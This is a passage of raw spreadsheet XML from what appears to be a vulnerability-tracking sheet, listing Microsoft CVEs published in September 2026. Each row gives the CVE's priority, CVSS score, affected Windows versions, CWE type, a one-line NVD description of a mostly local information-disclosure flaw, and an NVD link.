microsoft:windows_11_26h1</t></is></c><c r="L1242" s="5" t="inlineStr" /><c r="M1242" s="5" t="inlineStr" /><c r="N1242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1242" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1242" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1242" s="5" t="inlineStr" /><c r="R1242" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1242" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="T1242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68842</t></is></c></row><row r="1243"><c r="A1243" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1243" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1243" s="5" t="inlineStr"><is><t>CVE-2026-68843</t></is></c><c r="D1243" s="5" t="n"><v>5.5</v></c><c r="E1243" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1243" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1243" s="5" t="inlineStr" /><c r="H1243" s="5" t="n"><v>0.003</v></c><c r="I1243" s="5" t="inlineStr" /><c r="J1243" s="5" t="inlineStr" /><c r="K1243" s="5" t="inlineStr" /><c r="L1243" s="5" t="inlineStr" /><c r="M1243" s="5" t="inlineStr" /><c r="N1243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1243" s="5" t="inlineStr" /><c r="R1243" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1243" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="T1243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68843</t></is></c></row><row r="1244"><c r="A1244" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1244" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1244" s="5" t="inlineStr"><is><t>CVE-2026-68851</t></is></c><c r="D1244" s="5" t="n"><v>5.5</v></c><c r="E1244" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1244" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1244" s="5" t="inlineStr" /><c r="H1244" s="5" t="n"><v>0.003</v></c><c r="I1244" s="5" t="inlineStr" /><c r="J1244" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K124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44" s="5" t="inlineStr" /><c r="M1244" s="5" t="inlineStr" /><c r="N1244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1244" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1244" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1244" s="5" t="inlineStr" /><c r="R1244" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1244" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t></is></c></row><row r="1245"><c r="A1245" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1245" s="5" t="inlineStr"><is><t>CVE-2026-68852</t></is></c><c r="D1245" s="5" t="n"><v>5.5</v></c><c r="E1245" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1245" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1245" s="5" t="inlineStr" /><c r="H1245" s="5" t="n"><v>0.003</v></c><c r="I1245" s="5" t="inlineStr" /><c r="J1245" s="5" t="inlineStr" /><c r="K1245" s="5" t="inlineStr" /><c r="L1245" s="5" t="inlineStr" /><c r="M1245" s="5" t="inlineStr" /><c r="N1245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1245" s="5" t="inlineStr" /><c r="R1245" s="5" t="inlineStr"><is><t>CWE-200, CWE-908</t></is></c><c r="S1245" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Account allows an authorized attacker to disclose information locally.</t></is></c><c r="T1245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68852</t></is></c></row><row r="1246"><c r="A1246" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1246" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1246" s="5" t="inlineStr"><is><t>CVE-2026-68873</t></is></c><c r="D1246" s="5" t="n"><v>5.5</v></c><c r="E1246" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1246" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1246" s="5" t="inlineStr" /><c r="H1246" s="5" t="n"><v>0.005</v></c><c r="I1246" s="5" t="inlineStr" /><c r="J1246" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1246" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1246" s="5" t="inlineStr" /><c r="M1246" s="5" t="inlineStr" /><c r="N1246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1246" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1246" s="5" t="inlineStr" /><c r="R1246" s="5" t="inlineStr"><is><t>CWE-532, CWE-908</t></is></c><c r="S1246" s="5" t="inlineStr"><is><t>Insertion of sensitive information into log file in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68873</t></is></c></row><row r="1247"><c r="A1247" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1247" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1247" s="5" t="inlineStr"><is><t>CVE-2026-68881</t></is></c><c r="D1247" s="5" t="n"><v>5.5</v></c><c r="E1247" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1247" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1247" s="5" t="inlineStr" /><c r="H1247" s="5" t="n"><v>0.003</v></c><c r="I1247" s="5" t="inlineStr" /><c r="J1247" s="5" t="inlineStr" /><c r="K1247" s="5" t="inlineStr" /><c r="L1247" s="5" t="inlineStr" /><c r="M1247" s="5" t="inlineStr" /><c r="N1247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1247" s="5" t="inlineStr" /><c r="R1247" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1247" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68881</t></is></c></row><row r="1248"><c r="A1248" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1248" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1248" s="5" t="inlineStr"><is><t>CVE-2026-68886</t></is></c><c r="D1248" s="5" t="n"><v>5.5</v></c><c r="E1248" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1248" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1248" s="5" t="inlineStr" /><c r="H1248" s="5" t="n"><v>0.005</v></c><c r="I1248" s="5" t="inlineStr" /><c r="J1248" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K124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48" s="5" t="inlineStr" /><c r="M1248" s="5" t="inlineStr" /><c r="N1248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1248" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1248" s="5" t="inlineStr" /><c r="R1248" s="5" t="inlineStr"><is><t>CWE-209, CWE-416</t></is></c><c r="S1248" s="5" t="inlineStr"><is><t>Use after free in Windows Network Connection Broker allows an authorized attacker to disclose information locally.</t></is></c><c r="T1248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68886</t></is></c></row><row r="1249"><c r="A1249" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1249" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1249" s="5" t="inlineStr"><is><t>CVE-2026-68895</t></is></c><c r="D1249" s="5" t="n"><v>5.5</v></c><c r="E1249" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1249" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1249" s="5" t="inlineStr" /><c r="H1249" s="5" t="n"><v>0.003</v></c><c r="I1249" s="5" t="inlineStr" /><c r="J1249" s="5" t="inlineStr" /><c r="K1249" s="5" t="inlineStr" /><c r="L1249" s="5" t="inlineStr" /><c r="M1249" s="5" t="inlineStr" /><c r="N1249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1249" s="5" t="inlineStr" /><c r="R1249" s="5" t="inlineStr"><is><t>CWE-197</t></is></c><c r="S1249" s="5" t="inlineStr"><is><t>Numeric truncation error in Internet Storage Name Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68895</t></is></c></row><row r="1250"><c r="A1250" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1250" s="5" t="inlineStr"><is><t>CVE-2026-69286</t></is></c><c r="D1250" s="5" t="n"><v>5.5</v></c><c r="E1250" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1250" s="5" t="inlineStr" /><c r="H1250" s="5" t="n"><v>0.004</v></c><c r="I1250" s="5" t="inlineStr" /><c r="J1250" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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0" s="5" t="inlineStr" /><c r="M1250" s="5" t="inlineStr" /><c r="N1250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1250" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1250" s="5" t="inlineStr" /><c r="R1250" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1250" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t></is></c><c r="T1250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t></is></c></row><row r="1251"><c r="A1251" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1251" s="5" t="inlineStr"><is><t>CVE-2026-69288</t></is></c><c r="D1251" s="5" t="n"><v>5.5</v></c><c r="E1251" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1251" s="5" t="inlineStr" /><c r="H1251" s="5" t="n"><v>0.003</v></c><c r="I1251" s="5" t="inlineStr" /><c r="J1251" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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1" s="5" t="inlineStr" /><c r="M1251" s="5" t="inlineStr" /><c r="N1251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1251" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1251" s="5" t="inlineStr" /><c r="R1251" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1251" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows GDI+ allows an authorized attacker to disclose information locally.</t></is></c><c r="T1251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69288</t></is></c></row><row r="1252"><c r="A1252" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1252" s="5" t="inlineStr"><is><t>CVE-2026-69294</t></is></c><c r="D1252" s="5" t="n"><v>5.5</v></c><c r="E1252" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1252" s="5" t="inlineStr" /><c r="H1252" s="5" t="n"><v>0.003</v></c><c r="I1252" s="5" t="inlineStr" /><c r="J1252" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1252"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252" s="5" t="inlineStr" /><c r="M1252" s="5" t="inlineStr" /><c r="N1252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1252" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1252" s="5" t="inlineStr" /><c r="R1252" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1252" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Microsoft COM for Windows allows an authorized attacker to disclose information locally.</t></is></c><c r="T1252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69294</t></is></c></row><row r="1253"><c r="A1253" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1253" s="5" t="inlineStr"><is><t>CVE-2026-69303</t></is></c><c r="D1253" s="5" t="n"><v>5.5</v></c><c r="E1253" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1253" s="5" t="inlineStr" /><c r="H1253" s="5" t="n"><v>0.004</v></c><c r="I1253" s="5" t="inlineStr" /><c r="J1253" s="5" t="inlineStr" /><c r="K1253" s="5" t="inlineStr" /><c r="L1253" s="5" t="inlineStr" /><c r="M1253" s="5" t="inlineStr" /><c r="N1253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1253" s="5" t="inlineStr" /><c r="R1253" s="5" t="inlineStr"><is><t>CWE-125, CWE-191</t></is></c><c r="S1253" s="5" t="inlineStr"><is><t>Out-of-bounds read in Push Message Routing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69303</t></is></c></row><row r="1254"><c r="A1254" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1254" s="5" t="inlineStr"><is><t>CVE-2026-69308</t></is></c><c r="D1254" s="5" t="n"><v>5.5</v></c><c r="E1254" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1254" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1254" s="5" t="inlineStr" /><c r="H1254" s="5" t="n"><v>0.004</v></c><c r="I1254" s="5" t="inlineStr" /><c r="J1254" s="5" t="inlineStr" /><c r="K1254" s="5" t="inlineStr" /><c r="L1254" s="5" t="inlineStr" /><c r="M1254" s="5" t="inlineStr" /><c r="N1254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1254" s="5" t="inlineStr" /><c r="R1254" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1254" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69308</t></is></c></row><row r="1255"><c r="A1255" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1255" s="5" t="inlineStr"><is><t>CVE-2026-69315</t></is></c><c r="D1255" s="5" t="n"><v>5.5</v></c><c r="E1255" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1255" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1255" s="5" t="inlineStr" /><c r="H1255" s="5" t="n"><v>0.005</v></c><c r="I1255" s="5" t="inlineStr" /><c r="J1255" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1255"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255" s="5" t="inlineStr" /><c r="M1255" s="5" t="inlineStr" /><c r="N1255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1255" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1255" s="5" t="inlineStr" /><c r="R1255" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1255" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows License Manager allows an authorized attacker to disclose information locally.</t></is></c><c r="T1255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69315</t></is></c></row><row r="1256"><c r="A1256" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1256" s="5" t="inlineStr"><is><t>CVE-2026-69318</t></is></c><c r="D1256" s="5" t="n"><v>5.5</v></c><c r="E1256" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1256" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1256" s="5" t="inlineStr" /><c r="H1256" s="5" t="n"><v>0.004</v></c><c r="I1256" s="5" t="inlineStr" /><c r="J1256" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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6" s="5" t="inlineStr" /><c r="M1256" s="5" t="inlineStr" /><c r="N1256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1256" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1256" s="5" t="inlineStr" /><c r="R1256" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1256" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Imaging Component allows an authorized attacker to disclose information locally.</t></is></c><c r="T1256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69318</t></is></c></row><row r="1257"><c r="A1257" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1257" s="5" t="inlineStr"><is><t>CVE-2026-69321</t></is></c><c r="D1257" s="5" t="n"><v>5.5</v></c><c r="E1257" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1257" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1257" s="5" t="inlineStr" /><c r="H1257" s="5" t="n"><v>0.003</v></c><c r="I1257" s="5" t="inlineStr" /><c r="J1257" s="5" t="inlineStr" /><c r="K1257" s="5" t="inlineStr" /><c r="L1257" s="5" t="inlineStr" /><c r="M1257" s="5" t="inlineStr" /><c r="N1257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1257" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1257" s="5" t="inlineStr" /><c r="R1257" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1257" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Power Dependency Coordinator allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69321</t></is></c></row><row r="1258"><c r="A1258" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1258" s="5" t="inlineStr"><is><t>CVE-2026-69339</t></is></c><c r="D1258" s="5" t="n"><v>5.5</v></c><c r="E1258" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1258" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1258" s="5" t="inlineStr" /><c r="H1258" s="5" t="n"><v>0.005</v></c><c r="I1258" s="5" t="inlineStr" /><c r="J1258" s="5" t="inlineStr" /><c r="K1258" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1258" s="5" t="inlineStr" /><c r="M1258" s="5" t="inlineStr" /><c r="N1258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1258" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1258" s="5" t="inlineStr" /><c r="R1258" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1258" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="T1258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69339</t></is></c></row><row r="1259"><c r="A1259" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1259" s="5" t="inlineStr"><is><t>CVE-2026-69343</t></is></c><c r="D1259" s="5" t="n"><v>5.5</v></c><c r="E1259" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1259" s="5" t="inlineStr" /><c r="H1259" s="5" t="n"><v>0.004</v></c><c r="I1259" s="5" t="inlineStr" /><c r="J1259" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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9" s="5" t="inlineStr" /><c r="M1259" s="5" t="inlineStr" /><c r="N1259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1259" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1259" s="5" t="inlineStr" /><c r="R1259" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1259" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="T1259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t></is></c></row><row r="1260"><c r="A1260" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1260" s="5" t="inlineStr"><is><t>CVE-2026-69344</t></is></c><c r="D1260" s="5" t="n"><v>5.5</v></c><c r="E1260" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1260" s="5" t="inlineStr" /><c r="H1260" s="5" t="n"><v>0.004</v></c><c r="I1260" s="5" t="inlineStr" /><c r="J1260" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1260" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1260" s="5" t="inlineStr" /><c r="M1260" s="5" t="inlineStr" /><c r="N1260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1260" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1260" s="5" t="inlineStr" /><c r="R1260" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1260" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Print Spooler Components allows an authorized attacker to disclose information locally.</t></is></c><c r="T1260" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69344</t></is></c></row><row r="1261"><c r="A1261" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1261" s="5" t="inlineStr"><is><t>CVE-2026-69345</t></is></c><c r="D1261" s="5" t="n"><v>5.5</v></c><c r="E1261" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1261" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1261" s="5" t="inlineStr" /><c r="H1261" s="5" t="n"><v>0.004</v></c><c r="I1261" s="5" t="inlineStr" /><c r="J1261" s="5" t="inlineStr" /><c r="K1261" s="5" t="inlineStr" /><c r="L1261" s="5" t="inlineStr" /><c r="M1261" s="5" t="inlineStr" /><c r="N1261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1261" s="5" t="inlineStr" /><c r="R1261" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1261" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69345</t></is></c></row><row r="1262"><c r="A1262" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1262" s="5" t="inlineStr"><is><t>CVE-2026-69351</t></is></c><c r="D1262" s="5" t="n"><v>5.5</v></c><c r="E1262" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1262" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1262" s="5" t="inlineStr" /><c r="H1262" s="5" t="n"><v>0.005</v></c><c r="I1262" s="5" t="inlineStr" /><c r="J1262" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K126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62" s="5" t="inlineStr" /><c r="M1262" s="5" t="inlineStr" /><c r="N1262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1262" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1262" s="5" t="inlineStr" /><c r="R1262" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="S1262" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="T1262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69351</t></is></c></row><row r="1263"><c r="A1263" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1263" s="5" t="inlineStr"><is><t>CVE-2026-69353</t></is></c><c r="D1263" s="5" t="n"><v>5.5</v></c><c r="E1263" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1263" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1263" s="5" t="inlineStr" /><c r="H1263" s="5" t="n"><v>0.004</v></c><c r="I1263" s="5" t="inlineStr" /><c r="J1263" s="5" t="inlineStr" /><c r="K1263" s="5" t="inlineStr" /><c r="L1263" s="5" t="inlineStr" /><c r="M1263" s="5" t="inlineStr" /><c r="N1263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1263" s="5" t="inlineStr" /><c r="R1263" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1263" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Text Shaping allows an authorized attacker to disclose information locally.</t></is></c><c r="T1263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69353</t></is></c></row><row r="1264"><c r="A1264" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1264" s="5" t="inlineStr"><is><t>CVE-2026-69367</t></is></c><c r="D1264" s="5" t="n"><v>5.5</v></c><c r="E1264" s="5" 